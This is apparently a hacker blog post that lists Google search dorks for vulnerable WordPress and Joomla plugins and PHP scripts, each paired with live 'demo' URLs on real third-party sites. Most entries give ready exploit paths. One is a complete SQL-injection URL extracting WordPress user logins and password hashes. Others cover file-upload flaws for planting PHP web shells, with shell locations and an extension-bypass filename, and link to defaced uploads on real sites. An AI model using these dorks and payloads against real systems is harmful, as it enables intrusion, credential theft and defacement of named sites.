Dork dan Exploit

chmood
1.Espacio Ecuador
[ dork ]
intext:"developed by Espacio Ecuador"  inurl:id=
[ demo ]
http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25
[ details ]
http://cxsecurity.com/issue/WLB-2012110228

2. Seventeen Design
[ dork ]
intext:"Producido por: Seventeen Design." inurl:id=
[ demo ]
http://www.monteavila.gob.ve/mae/detail_new.php?id=147'
[ details ]
http://cxsecurity.com/issue/WLB-2012110225

3.  Plugin Wordpress Newsletter
[ dork ]
allinurl:stnl_iframe.php?newsletter=
[ demo ]
http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7

4. Plugin Wodpress Wp- Imagezoon
[ dork ]
allinurl:wp-imagezoom/zoom.php?id=
[ demo ]
http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=GnAaX

5. Wordpress Daily Edditionmouss
[ dork ]
inurl:fiche-artiste.php?id=
inurl:themes/dailyedition-mouss/fiche-artiste.php?id=
[ demo ]
http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=383

6. Wp- Plugin" Plg_Novana"
[ dork ]
inurl:novana_detail.php?**id=
[ exploit ]
/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
[ demo ]
http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--
[ detail ]
http://1337day.com/exploit/19787

7. Girl .php
[ dork ]
inurl:girl.php?id=
[ demo ]
http://www.btsfashionshow.com/girl.php?id=6
http://www.aramis-london-escorts.com/girl.php?id=301
http://www.pornescort.xxx/girl.php?id=68

8. Like .php
[ dork ]
inurl:like.php?id= intext:LikeItNow Script © 2010
[ demo ]
http://neonapster.net23.net/like.php?id=34%27


 Tamper Data

1. Joomla Componen com_smartformer
[ dork ]
inurl:index.php?option=com_smartformer  inurl:itemid= intext:Upload
[ demo ]
http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90
[ shell location ]
site/components/com_smartformer/files/yournameshell.php
[ details ]
http://1337day.com/exploit/19825

2. Plugin Wordpress Zarzadzanie Kontem (Ajax File Manager)
[ dork ]
inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager
[ demo ]
http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5

3.Wp- Plugin "tdo-mini-form"
[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
[ details ]
http://1337day.com/exploit/19776 

4.JQuery File Upload
[ dork ]
intitle:upload intext:Add files.. "Start upload" Cancel upload Delete
[ vuln ]
http://konceptsigngroup.com/jQuery-FileUpload/index.html
[ demo ]
http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg 

5. Upload Tiny Browser
[new dork ]
inurl:tinybrowser/upload.php
intitle:Index of / intext:Parent Directory "tinybrowser/"
inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php
inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload
inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload
[ demo ]
http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php
[ example ]
http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg
[ details ]
http://1337day.com/exploit/19732

6. Joomla File Upload "com_autostand"
[dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car
inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin
inurl:index.php?option=com_autostand
[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem
[ demo ]
http://www.karahan.be/index.php?option=com_autostand&func=newItem   


TAMPER DATA & SHELL UPLOAD

1. Plugin Spot Light
[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"
inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.
inurl:wp-content/plugins/spotlightyour/
[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/
[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php
[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/

Komentar